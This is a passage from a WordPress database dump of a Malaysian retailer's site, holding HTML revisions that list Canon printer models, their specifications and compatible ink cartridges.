</td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:03:07','2019-09-25 02:03:07','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3324,1,'2019-09-25 10:01:57','2019-09-25 02:01:57','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<p>Â </p><table border=\"1\" width=\"378\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td><td>Maintenance Cartridge MC-20</td></tr><tr><td>PFI-50 (Blue)</td></tr><tr><td>PFI-50 (Chroma Optimizer)</td></tr><tr><td>PFI-50 (Cyan)</td></tr><tr><td>PFI-50 (Gray)</td></tr><tr><td>PFI-50 (Magenta)</td></tr><tr><td>PFI-50 (Matte Black)</td></tr><tr><td>PFI-50 (Photo Black)</td></tr><tr><td>PFI-50 (Photo Cyan)</td></tr><tr><td>PFI-50 (Photo Gray)</td></tr><tr><td>PFI-50 (Photo Magenta)</td></tr><tr><td>PFI-50 (Red)</td></tr><tr><td>PFI-50 (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E3170</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E410</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr></tbody></table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E4270</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E470</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E477</td><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E480</td><td>CL-57 (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E510</td><td>CL-98 (Colour)</td></tr><tr><td>PG-88 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G2010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G4010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP100</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA iP1300</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr></tbody></table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-755XXL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      